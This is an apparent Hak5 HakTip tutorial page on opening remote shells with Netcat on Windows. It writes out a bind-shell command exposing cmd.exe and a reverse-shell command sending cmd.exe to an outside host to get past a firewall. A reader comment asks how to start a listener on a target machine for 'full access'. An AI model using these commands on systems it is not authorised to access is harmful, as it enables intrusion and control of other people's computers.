Haktip 86 – Netcat 101: Remote Shells in Windows

This week on HakTip Shannon is creating remote shells with Netcat in Windows!

Download HD  |   Download MP4


Welcome to HakTip — the show where we break down concepts, tools and techniques for hackers, gurus and IT ninjas. I’m Shannon Morse and today i’m creating remote shells with Netcat in Windows!
What is a remote shell? This is a command line computer program that you can use on all operating systems, that can execute shell commands as another user and on another computer, even on a different network. The remote system connects and runs a remote shell daemon, using a common TCP port. This is where we get into a real world scenario. You can use a remote shell to target a computer for nefarious purposes, or to do real world good- like logging files or troubleshooting.
While I’m not going to show you how to get a victim to start a shell on their computer without their knowledge, I will show you how to do a legit remote shell for white hat use. Let’s go ahead and prepare the Windows machine for a remote shell. Open your command prompt and change to your Netcat directory. Type the following command:
* nc –Lp 31337 –vv –e cmd.exe
This will open netcat. -Lp will put it in a persistant listening mode. So if you close Netcat on one machine, this listener port will stay open indefinitely listening for a new entry. -vv tells Netcat to be extra verbose with outputs, which will be useful for file transfers, etc. -e opens the “gaping security hole”, and cmd.exe is telling Netcat that this executable will be available on a remote machine.
Now, on my Linux machine I’m going to connect to the target computer with this command:
* nc 31337
This opens Netcat, connects to my Windows on port 31337. Now once it connects I can do things! I can type dir /w to see a directory listing on the computer. I can make a new directory with md MyDirectory. On my Windows machine I can see the new directory and make sure it’s been created with dir /w again on the Linux pc.
Netcat can also run a remote shell from another port through a server outside of a firewall. So I could run this command: nc hak5.wifipineapple.com 80 -e cmd.exe then I could make an unencrypted tunnel from the outside world. Easy!
Do you use Netcat? Send me a comment below or email us at [email protected]
And be sure to check out our sister show, Hak5 for more great stuff just like this. I’ll be there, reminding you to trust your technolust.


The HakShop is Hak5’s premiere store for all of your pen testing needs, including one of my favorites – The USB Rubber Ducky – which looks like a flashdrive and types like a keyboard. It can type scripts into a computer rediculously quickly… Like my new fav. from forum user N3W that reverses your mouse left and right buttons:
DELAY 4000
This is great for pranking your coworkers!
We couldn’t do this show without your support, so we’d like to thank you with something special:
Use coupon code “Snubs” with any order for your very own signed HakTip stickers. Thanks for supporting the show!

1 Comment

  • VK Infosec Consultant

    Hi there, i have a Question. Let’s say the netcat is already there on a remote machine (Note :It’s not listening to any port)..i have the only option to make it listen on some specific port from my Browser only. So can u tell me how can i make it start listening, because technically, whenever u access that file remotely, the browser ask u to download it. But what i want is that, i want to run it on the target machine so that i can have full access to that remote machine.

    ThanX in Advance & Best Regards

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>